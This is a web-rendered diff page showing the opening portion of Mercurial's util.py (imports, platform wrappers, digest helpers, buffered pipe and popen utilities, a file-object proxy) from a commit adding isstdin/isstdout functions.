##// END OF EJS Templates
util: add public isstdin/isstdout() functions
Yuya Nishihara -
r36811:eca1051e default
parent child Browse files
Show More
@@ -1,4055 +1,4061 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import codecs
20 import codecs
21 import collections
21 import collections
22 import contextlib
22 import contextlib
23 import errno
23 import errno
24 import gc
24 import gc
25 import hashlib
25 import hashlib
26 import imp
26 import imp
27 import io
27 import io
28 import itertools
28 import itertools
29 import mmap
29 import mmap
30 import os
30 import os
31 import platform as pyplatform
31 import platform as pyplatform
32 import re as remod
32 import re as remod
33 import shutil
33 import shutil
34 import signal
34 import signal
35 import socket
35 import socket
36 import stat
36 import stat
37 import string
37 import string
38 import subprocess
38 import subprocess
39 import sys
39 import sys
40 import tempfile
40 import tempfile
41 import textwrap
41 import textwrap
42 import time
42 import time
43 import traceback
43 import traceback
44 import warnings
44 import warnings
45 import zlib
45 import zlib
46
46
47 from . import (
47 from . import (
48 encoding,
48 encoding,
49 error,
49 error,
50 i18n,
50 i18n,
51 node as nodemod,
51 node as nodemod,
52 policy,
52 policy,
53 pycompat,
53 pycompat,
54 urllibcompat,
54 urllibcompat,
55 )
55 )
56 from .utils import dateutil
56 from .utils import dateutil
57
57
58 base85 = policy.importmod(r'base85')
58 base85 = policy.importmod(r'base85')
59 osutil = policy.importmod(r'osutil')
59 osutil = policy.importmod(r'osutil')
60 parsers = policy.importmod(r'parsers')
60 parsers = policy.importmod(r'parsers')
61
61
62 b85decode = base85.b85decode
62 b85decode = base85.b85decode
63 b85encode = base85.b85encode
63 b85encode = base85.b85encode
64
64
65 cookielib = pycompat.cookielib
65 cookielib = pycompat.cookielib
66 empty = pycompat.empty
66 empty = pycompat.empty
67 httplib = pycompat.httplib
67 httplib = pycompat.httplib
68 pickle = pycompat.pickle
68 pickle = pycompat.pickle
69 queue = pycompat.queue
69 queue = pycompat.queue
70 socketserver = pycompat.socketserver
70 socketserver = pycompat.socketserver
71 stderr = pycompat.stderr
71 stderr = pycompat.stderr
72 stdin = pycompat.stdin
72 stdin = pycompat.stdin
73 stdout = pycompat.stdout
73 stdout = pycompat.stdout
74 stringio = pycompat.stringio
74 stringio = pycompat.stringio
75 xmlrpclib = pycompat.xmlrpclib
75 xmlrpclib = pycompat.xmlrpclib
76
76
77 httpserver = urllibcompat.httpserver
77 httpserver = urllibcompat.httpserver
78 urlerr = urllibcompat.urlerr
78 urlerr = urllibcompat.urlerr
79 urlreq = urllibcompat.urlreq
79 urlreq = urllibcompat.urlreq
80
80
81 # workaround for win32mbcs
81 # workaround for win32mbcs
82 _filenamebytestr = pycompat.bytestr
82 _filenamebytestr = pycompat.bytestr
83
83
84 def isatty(fp):
84 def isatty(fp):
85 try:
85 try:
86 return fp.isatty()
86 return fp.isatty()
87 except AttributeError:
87 except AttributeError:
88 return False
88 return False
89
89
90 # glibc determines buffering on first write to stdout - if we replace a TTY
90 # glibc determines buffering on first write to stdout - if we replace a TTY
91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
92 # buffering
92 # buffering
93 if isatty(stdout):
93 if isatty(stdout):
94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
95
95
96 if pycompat.iswindows:
96 if pycompat.iswindows:
97 from . import windows as platform
97 from . import windows as platform
98 stdout = platform.winstdout(stdout)
98 stdout = platform.winstdout(stdout)
99 else:
99 else:
100 from . import posix as platform
100 from . import posix as platform
101
101
102 _ = i18n._
102 _ = i18n._
103
103
104 bindunixsocket = platform.bindunixsocket
104 bindunixsocket = platform.bindunixsocket
105 cachestat = platform.cachestat
105 cachestat = platform.cachestat
106 checkexec = platform.checkexec
106 checkexec = platform.checkexec
107 checklink = platform.checklink
107 checklink = platform.checklink
108 copymode = platform.copymode
108 copymode = platform.copymode
109 executablepath = platform.executablepath
109 executablepath = platform.executablepath
110 expandglobs = platform.expandglobs
110 expandglobs = platform.expandglobs
111 explainexit = platform.explainexit
111 explainexit = platform.explainexit
112 findexe = platform.findexe
112 findexe = platform.findexe
113 getfsmountpoint = platform.getfsmountpoint
113 getfsmountpoint = platform.getfsmountpoint
114 getfstype = platform.getfstype
114 getfstype = platform.getfstype
115 gethgcmd = platform.gethgcmd
115 gethgcmd = platform.gethgcmd
116 getuser = platform.getuser
116 getuser = platform.getuser
117 getpid = os.getpid
117 getpid = os.getpid
118 groupmembers = platform.groupmembers
118 groupmembers = platform.groupmembers
119 groupname = platform.groupname
119 groupname = platform.groupname
120 hidewindow = platform.hidewindow
120 hidewindow = platform.hidewindow
121 isexec = platform.isexec
121 isexec = platform.isexec
122 isowner = platform.isowner
122 isowner = platform.isowner
123 listdir = osutil.listdir
123 listdir = osutil.listdir
124 localpath = platform.localpath
124 localpath = platform.localpath
125 lookupreg = platform.lookupreg
125 lookupreg = platform.lookupreg
126 makedir = platform.makedir
126 makedir = platform.makedir
127 nlinks = platform.nlinks
127 nlinks = platform.nlinks
128 normpath = platform.normpath
128 normpath = platform.normpath
129 normcase = platform.normcase
129 normcase = platform.normcase
130 normcasespec = platform.normcasespec
130 normcasespec = platform.normcasespec
131 normcasefallback = platform.normcasefallback
131 normcasefallback = platform.normcasefallback
132 openhardlinks = platform.openhardlinks
132 openhardlinks = platform.openhardlinks
133 oslink = platform.oslink
133 oslink = platform.oslink
134 parsepatchoutput = platform.parsepatchoutput
134 parsepatchoutput = platform.parsepatchoutput
135 pconvert = platform.pconvert
135 pconvert = platform.pconvert
136 poll = platform.poll
136 poll = platform.poll
137 popen = platform.popen
137 popen = platform.popen
138 posixfile = platform.posixfile
138 posixfile = platform.posixfile
139 quotecommand = platform.quotecommand
139 quotecommand = platform.quotecommand
140 readpipe = platform.readpipe
140 readpipe = platform.readpipe
141 rename = platform.rename
141 rename = platform.rename
142 removedirs = platform.removedirs
142 removedirs = platform.removedirs
143 samedevice = platform.samedevice
143 samedevice = platform.samedevice
144 samefile = platform.samefile
144 samefile = platform.samefile
145 samestat = platform.samestat
145 samestat = platform.samestat
146 setbinary = platform.setbinary
146 setbinary = platform.setbinary
147 setflags = platform.setflags
147 setflags = platform.setflags
148 setsignalhandler = platform.setsignalhandler
148 setsignalhandler = platform.setsignalhandler
149 shellquote = platform.shellquote
149 shellquote = platform.shellquote
150 shellsplit = platform.shellsplit
150 shellsplit = platform.shellsplit
151 spawndetached = platform.spawndetached
151 spawndetached = platform.spawndetached
152 split = platform.split
152 split = platform.split
153 sshargs = platform.sshargs
153 sshargs = platform.sshargs
154 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
154 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
155 statisexec = platform.statisexec
155 statisexec = platform.statisexec
156 statislink = platform.statislink
156 statislink = platform.statislink
157 testpid = platform.testpid
157 testpid = platform.testpid
158 umask = platform.umask
158 umask = platform.umask
159 unlink = platform.unlink
159 unlink = platform.unlink
160 username = platform.username
160 username = platform.username
161
161
162 try:
162 try:
163 recvfds = osutil.recvfds
163 recvfds = osutil.recvfds
164 except AttributeError:
164 except AttributeError:
165 pass
165 pass
166 try:
166 try:
167 setprocname = osutil.setprocname
167 setprocname = osutil.setprocname
168 except AttributeError:
168 except AttributeError:
169 pass
169 pass
170 try:
170 try:
171 unblocksignal = osutil.unblocksignal
171 unblocksignal = osutil.unblocksignal
172 except AttributeError:
172 except AttributeError:
173 pass
173 pass
174
174
175 # Python compatibility
175 # Python compatibility
176
176
177 _notset = object()
177 _notset = object()
178
178
179 def safehasattr(thing, attr):
179 def safehasattr(thing, attr):
180 return getattr(thing, attr, _notset) is not _notset
180 return getattr(thing, attr, _notset) is not _notset
181
181
182 def _rapply(f, xs):
182 def _rapply(f, xs):
183 if xs is None:
183 if xs is None:
184 # assume None means non-value of optional data
184 # assume None means non-value of optional data
185 return xs
185 return xs
186 if isinstance(xs, (list, set, tuple)):
186 if isinstance(xs, (list, set, tuple)):
187 return type(xs)(_rapply(f, x) for x in xs)
187 return type(xs)(_rapply(f, x) for x in xs)
188 if isinstance(xs, dict):
188 if isinstance(xs, dict):
189 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
189 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
190 return f(xs)
190 return f(xs)
191
191
192 def rapply(f, xs):
192 def rapply(f, xs):
193 """Apply function recursively to every item preserving the data structure
193 """Apply function recursively to every item preserving the data structure
194
194
195 >>> def f(x):
195 >>> def f(x):
196 ... return 'f(%s)' % x
196 ... return 'f(%s)' % x
197 >>> rapply(f, None) is None
197 >>> rapply(f, None) is None
198 True
198 True
199 >>> rapply(f, 'a')
199 >>> rapply(f, 'a')
200 'f(a)'
200 'f(a)'
201 >>> rapply(f, {'a'}) == {'f(a)'}
201 >>> rapply(f, {'a'}) == {'f(a)'}
202 True
202 True
203 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
203 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
204 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
204 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
205
205
206 >>> xs = [object()]
206 >>> xs = [object()]
207 >>> rapply(pycompat.identity, xs) is xs
207 >>> rapply(pycompat.identity, xs) is xs
208 True
208 True
209 """
209 """
210 if f is pycompat.identity:
210 if f is pycompat.identity:
211 # fast path mainly for py2
211 # fast path mainly for py2
212 return xs
212 return xs
213 return _rapply(f, xs)
213 return _rapply(f, xs)
214
214
215 def bitsfrom(container):
215 def bitsfrom(container):
216 bits = 0
216 bits = 0
217 for bit in container:
217 for bit in container:
218 bits |= bit
218 bits |= bit
219 return bits
219 return bits
220
220
221 # python 2.6 still have deprecation warning enabled by default. We do not want
221 # python 2.6 still have deprecation warning enabled by default. We do not want
222 # to display anything to standard user so detect if we are running test and
222 # to display anything to standard user so detect if we are running test and
223 # only use python deprecation warning in this case.
223 # only use python deprecation warning in this case.
224 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
224 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
225 if _dowarn:
225 if _dowarn:
226 # explicitly unfilter our warning for python 2.7
226 # explicitly unfilter our warning for python 2.7
227 #
227 #
228 # The option of setting PYTHONWARNINGS in the test runner was investigated.
228 # The option of setting PYTHONWARNINGS in the test runner was investigated.
229 # However, module name set through PYTHONWARNINGS was exactly matched, so
229 # However, module name set through PYTHONWARNINGS was exactly matched, so
230 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
230 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
231 # makes the whole PYTHONWARNINGS thing useless for our usecase.
231 # makes the whole PYTHONWARNINGS thing useless for our usecase.
232 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
232 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
233 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
233 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
234 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
234 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
235 if _dowarn and pycompat.ispy3:
235 if _dowarn and pycompat.ispy3:
236 # silence warning emitted by passing user string to re.sub()
236 # silence warning emitted by passing user string to re.sub()
237 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
237 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
238 r'mercurial')
238 r'mercurial')
239 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
239 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
240 DeprecationWarning, r'mercurial')
240 DeprecationWarning, r'mercurial')
241
241
242 def nouideprecwarn(msg, version, stacklevel=1):
242 def nouideprecwarn(msg, version, stacklevel=1):
243 """Issue an python native deprecation warning
243 """Issue an python native deprecation warning
244
244
245 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
245 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
246 """
246 """
247 if _dowarn:
247 if _dowarn:
248 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
248 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
249 " update your code.)") % version
249 " update your code.)") % version
250 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
250 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
251
251
252 DIGESTS = {
252 DIGESTS = {
253 'md5': hashlib.md5,
253 'md5': hashlib.md5,
254 'sha1': hashlib.sha1,
254 'sha1': hashlib.sha1,
255 'sha512': hashlib.sha512,
255 'sha512': hashlib.sha512,
256 }
256 }
257 # List of digest types from strongest to weakest
257 # List of digest types from strongest to weakest
258 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
258 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
259
259
260 for k in DIGESTS_BY_STRENGTH:
260 for k in DIGESTS_BY_STRENGTH:
261 assert k in DIGESTS
261 assert k in DIGESTS
262
262
263 class digester(object):
263 class digester(object):
264 """helper to compute digests.
264 """helper to compute digests.
265
265
266 This helper can be used to compute one or more digests given their name.
266 This helper can be used to compute one or more digests given their name.
267
267
268 >>> d = digester([b'md5', b'sha1'])
268 >>> d = digester([b'md5', b'sha1'])
269 >>> d.update(b'foo')
269 >>> d.update(b'foo')
270 >>> [k for k in sorted(d)]
270 >>> [k for k in sorted(d)]
271 ['md5', 'sha1']
271 ['md5', 'sha1']
272 >>> d[b'md5']
272 >>> d[b'md5']
273 'acbd18db4cc2f85cedef654fccc4a4d8'
273 'acbd18db4cc2f85cedef654fccc4a4d8'
274 >>> d[b'sha1']
274 >>> d[b'sha1']
275 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
275 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
276 >>> digester.preferred([b'md5', b'sha1'])
276 >>> digester.preferred([b'md5', b'sha1'])
277 'sha1'
277 'sha1'
278 """
278 """
279
279
280 def __init__(self, digests, s=''):
280 def __init__(self, digests, s=''):
281 self._hashes = {}
281 self._hashes = {}
282 for k in digests:
282 for k in digests:
283 if k not in DIGESTS:
283 if k not in DIGESTS:
284 raise Abort(_('unknown digest type: %s') % k)
284 raise Abort(_('unknown digest type: %s') % k)
285 self._hashes[k] = DIGESTS[k]()
285 self._hashes[k] = DIGESTS[k]()
286 if s:
286 if s:
287 self.update(s)
287 self.update(s)
288
288
289 def update(self, data):
289 def update(self, data):
290 for h in self._hashes.values():
290 for h in self._hashes.values():
291 h.update(data)
291 h.update(data)
292
292
293 def __getitem__(self, key):
293 def __getitem__(self, key):
294 if key not in DIGESTS:
294 if key not in DIGESTS:
295 raise Abort(_('unknown digest type: %s') % k)
295 raise Abort(_('unknown digest type: %s') % k)
296 return nodemod.hex(self._hashes[key].digest())
296 return nodemod.hex(self._hashes[key].digest())
297
297
298 def __iter__(self):
298 def __iter__(self):
299 return iter(self._hashes)
299 return iter(self._hashes)
300
300
301 @staticmethod
301 @staticmethod
302 def preferred(supported):
302 def preferred(supported):
303 """returns the strongest digest type in both supported and DIGESTS."""
303 """returns the strongest digest type in both supported and DIGESTS."""
304
304
305 for k in DIGESTS_BY_STRENGTH:
305 for k in DIGESTS_BY_STRENGTH:
306 if k in supported:
306 if k in supported:
307 return k
307 return k
308 return None
308 return None
309
309
310 class digestchecker(object):
310 class digestchecker(object):
311 """file handle wrapper that additionally checks content against a given
311 """file handle wrapper that additionally checks content against a given
312 size and digests.
312 size and digests.
313
313
314 d = digestchecker(fh, size, {'md5': '...'})
314 d = digestchecker(fh, size, {'md5': '...'})
315
315
316 When multiple digests are given, all of them are validated.
316 When multiple digests are given, all of them are validated.
317 """
317 """
318
318
319 def __init__(self, fh, size, digests):
319 def __init__(self, fh, size, digests):
320 self._fh = fh
320 self._fh = fh
321 self._size = size
321 self._size = size
322 self._got = 0
322 self._got = 0
323 self._digests = dict(digests)
323 self._digests = dict(digests)
324 self._digester = digester(self._digests.keys())
324 self._digester = digester(self._digests.keys())
325
325
326 def read(self, length=-1):
326 def read(self, length=-1):
327 content = self._fh.read(length)
327 content = self._fh.read(length)
328 self._digester.update(content)
328 self._digester.update(content)
329 self._got += len(content)
329 self._got += len(content)
330 return content
330 return content
331
331
332 def validate(self):
332 def validate(self):
333 if self._size != self._got:
333 if self._size != self._got:
334 raise Abort(_('size mismatch: expected %d, got %d') %
334 raise Abort(_('size mismatch: expected %d, got %d') %
335 (self._size, self._got))
335 (self._size, self._got))
336 for k, v in self._digests.items():
336 for k, v in self._digests.items():
337 if v != self._digester[k]:
337 if v != self._digester[k]:
338 # i18n: first parameter is a digest name
338 # i18n: first parameter is a digest name
339 raise Abort(_('%s mismatch: expected %s, got %s') %
339 raise Abort(_('%s mismatch: expected %s, got %s') %
340 (k, v, self._digester[k]))
340 (k, v, self._digester[k]))
341
341
342 try:
342 try:
343 buffer = buffer
343 buffer = buffer
344 except NameError:
344 except NameError:
345 def buffer(sliceable, offset=0, length=None):
345 def buffer(sliceable, offset=0, length=None):
346 if length is not None:
346 if length is not None:
347 return memoryview(sliceable)[offset:offset + length]
347 return memoryview(sliceable)[offset:offset + length]
348 return memoryview(sliceable)[offset:]
348 return memoryview(sliceable)[offset:]
349
349
350 closefds = pycompat.isposix
350 closefds = pycompat.isposix
351
351
352 _chunksize = 4096
352 _chunksize = 4096
353
353
354 class bufferedinputpipe(object):
354 class bufferedinputpipe(object):
355 """a manually buffered input pipe
355 """a manually buffered input pipe
356
356
357 Python will not let us use buffered IO and lazy reading with 'polling' at
357 Python will not let us use buffered IO and lazy reading with 'polling' at
358 the same time. We cannot probe the buffer state and select will not detect
358 the same time. We cannot probe the buffer state and select will not detect
359 that data are ready to read if they are already buffered.
359 that data are ready to read if they are already buffered.
360
360
361 This class let us work around that by implementing its own buffering
361 This class let us work around that by implementing its own buffering
362 (allowing efficient readline) while offering a way to know if the buffer is
362 (allowing efficient readline) while offering a way to know if the buffer is
363 empty from the output (allowing collaboration of the buffer with polling).
363 empty from the output (allowing collaboration of the buffer with polling).
364
364
365 This class lives in the 'util' module because it makes use of the 'os'
365 This class lives in the 'util' module because it makes use of the 'os'
366 module from the python stdlib.
366 module from the python stdlib.
367 """
367 """
368 def __new__(cls, fh):
368 def __new__(cls, fh):
369 # If we receive a fileobjectproxy, we need to use a variation of this
369 # If we receive a fileobjectproxy, we need to use a variation of this
370 # class that notifies observers about activity.
370 # class that notifies observers about activity.
371 if isinstance(fh, fileobjectproxy):
371 if isinstance(fh, fileobjectproxy):
372 cls = observedbufferedinputpipe
372 cls = observedbufferedinputpipe
373
373
374 return super(bufferedinputpipe, cls).__new__(cls)
374 return super(bufferedinputpipe, cls).__new__(cls)
375
375
376 def __init__(self, input):
376 def __init__(self, input):
377 self._input = input
377 self._input = input
378 self._buffer = []
378 self._buffer = []
379 self._eof = False
379 self._eof = False
380 self._lenbuf = 0
380 self._lenbuf = 0
381
381
382 @property
382 @property
383 def hasbuffer(self):
383 def hasbuffer(self):
384 """True is any data is currently buffered
384 """True is any data is currently buffered
385
385
386 This will be used externally a pre-step for polling IO. If there is
386 This will be used externally a pre-step for polling IO. If there is
387 already data then no polling should be set in place."""
387 already data then no polling should be set in place."""
388 return bool(self._buffer)
388 return bool(self._buffer)
389
389
390 @property
390 @property
391 def closed(self):
391 def closed(self):
392 return self._input.closed
392 return self._input.closed
393
393
394 def fileno(self):
394 def fileno(self):
395 return self._input.fileno()
395 return self._input.fileno()
396
396
397 def close(self):
397 def close(self):
398 return self._input.close()
398 return self._input.close()
399
399
400 def read(self, size):
400 def read(self, size):
401 while (not self._eof) and (self._lenbuf < size):
401 while (not self._eof) and (self._lenbuf < size):
402 self._fillbuffer()
402 self._fillbuffer()
403 return self._frombuffer(size)
403 return self._frombuffer(size)
404
404
405 def readline(self, *args, **kwargs):
405 def readline(self, *args, **kwargs):
406 if 1 < len(self._buffer):
406 if 1 < len(self._buffer):
407 # this should not happen because both read and readline end with a
407 # this should not happen because both read and readline end with a
408 # _frombuffer call that collapse it.
408 # _frombuffer call that collapse it.
409 self._buffer = [''.join(self._buffer)]
409 self._buffer = [''.join(self._buffer)]
410 self._lenbuf = len(self._buffer[0])
410 self._lenbuf = len(self._buffer[0])
411 lfi = -1
411 lfi = -1
412 if self._buffer:
412 if self._buffer:
413 lfi = self._buffer[-1].find('\n')
413 lfi = self._buffer[-1].find('\n')
414 while (not self._eof) and lfi < 0:
414 while (not self._eof) and lfi < 0:
415 self._fillbuffer()
415 self._fillbuffer()
416 if self._buffer:
416 if self._buffer:
417 lfi = self._buffer[-1].find('\n')
417 lfi = self._buffer[-1].find('\n')
418 size = lfi + 1
418 size = lfi + 1
419 if lfi < 0: # end of file
419 if lfi < 0: # end of file
420 size = self._lenbuf
420 size = self._lenbuf
421 elif 1 < len(self._buffer):
421 elif 1 < len(self._buffer):
422 # we need to take previous chunks into account
422 # we need to take previous chunks into account
423 size += self._lenbuf - len(self._buffer[-1])
423 size += self._lenbuf - len(self._buffer[-1])
424 return self._frombuffer(size)
424 return self._frombuffer(size)
425
425
426 def _frombuffer(self, size):
426 def _frombuffer(self, size):
427 """return at most 'size' data from the buffer
427 """return at most 'size' data from the buffer
428
428
429 The data are removed from the buffer."""
429 The data are removed from the buffer."""
430 if size == 0 or not self._buffer:
430 if size == 0 or not self._buffer:
431 return ''
431 return ''
432 buf = self._buffer[0]
432 buf = self._buffer[0]
433 if 1 < len(self._buffer):
433 if 1 < len(self._buffer):
434 buf = ''.join(self._buffer)
434 buf = ''.join(self._buffer)
435
435
436 data = buf[:size]
436 data = buf[:size]
437 buf = buf[len(data):]
437 buf = buf[len(data):]
438 if buf:
438 if buf:
439 self._buffer = [buf]
439 self._buffer = [buf]
440 self._lenbuf = len(buf)
440 self._lenbuf = len(buf)
441 else:
441 else:
442 self._buffer = []
442 self._buffer = []
443 self._lenbuf = 0
443 self._lenbuf = 0
444 return data
444 return data
445
445
446 def _fillbuffer(self):
446 def _fillbuffer(self):
447 """read data to the buffer"""
447 """read data to the buffer"""
448 data = os.read(self._input.fileno(), _chunksize)
448 data = os.read(self._input.fileno(), _chunksize)
449 if not data:
449 if not data:
450 self._eof = True
450 self._eof = True
451 else:
451 else:
452 self._lenbuf += len(data)
452 self._lenbuf += len(data)
453 self._buffer.append(data)
453 self._buffer.append(data)
454
454
455 return data
455 return data
456
456
457 def mmapread(fp):
457 def mmapread(fp):
458 try:
458 try:
459 fd = getattr(fp, 'fileno', lambda: fp)()
459 fd = getattr(fp, 'fileno', lambda: fp)()
460 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
460 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
461 except ValueError:
461 except ValueError:
462 # Empty files cannot be mmapped, but mmapread should still work. Check
462 # Empty files cannot be mmapped, but mmapread should still work. Check
463 # if the file is empty, and if so, return an empty buffer.
463 # if the file is empty, and if so, return an empty buffer.
464 if os.fstat(fd).st_size == 0:
464 if os.fstat(fd).st_size == 0:
465 return ''
465 return ''
466 raise
466 raise
467
467
468 def popen2(cmd, env=None, newlines=False):
468 def popen2(cmd, env=None, newlines=False):
469 # Setting bufsize to -1 lets the system decide the buffer size.
469 # Setting bufsize to -1 lets the system decide the buffer size.
470 # The default for bufsize is 0, meaning unbuffered. This leads to
470 # The default for bufsize is 0, meaning unbuffered. This leads to
471 # poor performance on Mac OS X: http://bugs.python.org/issue4194
471 # poor performance on Mac OS X: http://bugs.python.org/issue4194
472 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
472 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
473 close_fds=closefds,
473 close_fds=closefds,
474 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
474 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
475 universal_newlines=newlines,
475 universal_newlines=newlines,
476 env=env)
476 env=env)
477 return p.stdin, p.stdout
477 return p.stdin, p.stdout
478
478
479 def popen3(cmd, env=None, newlines=False):
479 def popen3(cmd, env=None, newlines=False):
480 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
480 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
481 return stdin, stdout, stderr
481 return stdin, stdout, stderr
482
482
483 def popen4(cmd, env=None, newlines=False, bufsize=-1):
483 def popen4(cmd, env=None, newlines=False, bufsize=-1):
484 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
484 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
485 close_fds=closefds,
485 close_fds=closefds,
486 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
486 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
487 stderr=subprocess.PIPE,
487 stderr=subprocess.PIPE,
488 universal_newlines=newlines,
488 universal_newlines=newlines,
489 env=env)
489 env=env)
490 return p.stdin, p.stdout, p.stderr, p
490 return p.stdin, p.stdout, p.stderr, p
491
491
492 class fileobjectproxy(object):
492 class fileobjectproxy(object):
493 """A proxy around file objects that tells a watcher when events occur.
493 """A proxy around file objects that tells a watcher when events occur.
494
494
495 This type is intended to only be used for testing purposes. Think hard
495 This type is intended to only be used for testing purposes. Think hard
496 before using it in important code.
496 before using it in important code.
497 """
497 """
498 __slots__ = (
498 __slots__ = (
499 r'_orig',
499 r'_orig',
500 r'_observer',
500 r'_observer',
501 )
501 )
502
502
503 def __init__(self, fh, observer):
503 def __init__(self, fh, observer):
504 object.__setattr__(self, r'_orig', fh)
504 object.__setattr__(self, r'_orig', fh)
505 object.__setattr__(self, r'_observer', observer)
505 object.__setattr__(self, r'_observer', observer)
506
506
507 def __getattribute__(self, name):
507 def __getattribute__(self, name):
508 ours = {
508 ours = {
509 r'_observer',
509 r'_observer',
510
510
511 # IOBase
511 # IOBase
512 r'close',
512 r'close',
513 # closed if a property
513 # closed if a property
514 r'fileno',
514 r'fileno',
515 r'flush',
515 r'flush',
516 r'isatty',
516 r'isatty',
517 r'readable',
517 r'readable',
518 r'readline',
518 r'readline',
519 r'readlines',
519 r'readlines',
520 r'seek',
520 r'seek',
521 r'seekable',
521 r'seekable',
522 r'tell',
522 r'tell',
523 r'truncate',
523 r'truncate',
524 r'writable',
524 r'writable',
525 r'writelines',
525 r'writelines',
526 # RawIOBase
526 # RawIOBase
527 r'read',
527 r'read',
528 r'readall',
528 r'readall',
529 r'readinto',
529 r'readinto',
530 r'write',
530 r'write',
531 # BufferedIOBase
531 # BufferedIOBase
532 # raw is a property
532 # raw is a property
533 r'detach',
533 r'detach',
534 # read defined above
534 # read defined above
535 r'read1',
535 r'read1',
536 # readinto defined above
536 # readinto defined above
537 # write defined above
537 # write defined above
538 }
538 }
539
539
540 # We only observe some methods.
540 # We only observe some methods.
541 if name in ours:
541 if name in ours:
542 return object.__getattribute__(self, name)
542 return object.__getattribute__(self, name)
543
543
544 return getattr(object.__getattribute__(self, r'_orig'), name)
544 return getattr(object.__getattribute__(self, r'_orig'), name)
545
545
546 def __delattr__(self, name):
546 def __delattr__(self, name):
547 return delattr(object.__getattribute__(self, r'_orig'), name)
547 return delattr(object.__getattribute__(self, r'_orig'), name)
548
548
549 def __setattr__(self, name, value):
549 def __setattr__(self, name, value):
550 return setattr(object.__getattribute__(self, r'_orig'), name, value)
550 return setattr(object.__getattribute__(self, r'_orig'), name, value)
551
551
552 def __iter__(self):
552 def __iter__(self):
553 return object.__getattribute__(self, r'_orig').__iter__()
553 return object.__getattribute__(self, r'_orig').__iter__()
554
554
555 def _observedcall(self, name, *args, **kwargs):
555 def _observedcall(self, name, *args, **kwargs):
556 # Call the original object.
556 # Call the original object.
557 orig = object.__getattribute__(self, r'_orig')
557 orig = object.__getattribute__(self, r'_orig')
558 res = getattr(orig, name)(*args, **kwargs)
558 res = getattr(orig, name)(*args, **kwargs)
559
559
560 # Call a method on the observer of the same name with arguments
560 # Call a method on the observer of the same name with arguments
561 # so it can react, log, etc.
561 # so it can react, log, etc.
562 observer = object.__getattribute__(self, r'_observer')
562 observer = object.__getattribute__(self, r'_observer')
563 fn = getattr(observer, name, None)
563 fn = getattr(observer, name, None)
564 if fn:
564 if fn:
565 fn(res, *args, **kwargs)
565 fn(res, *args, **kwargs)
566
566
567 return res
567 return res
568
568
569 def close(self, *args, **kwargs):
569 def close(self, *args, **kwargs):
570 return object.__getattribute__(self, r'_observedcall')(
570 return object.__getattribute__(self, r'_observedcall')(
571 r'close', *args, **kwargs)
571 r'close', *args, **kwargs)
572
572
573 def fileno(self, *args, **kwargs):
573 def fileno(self, *args, **kwargs):
574 return object.__getattribute__(self, r'_observedcall')(
574 return object.__getattribute__(self, r'_observedcall')(
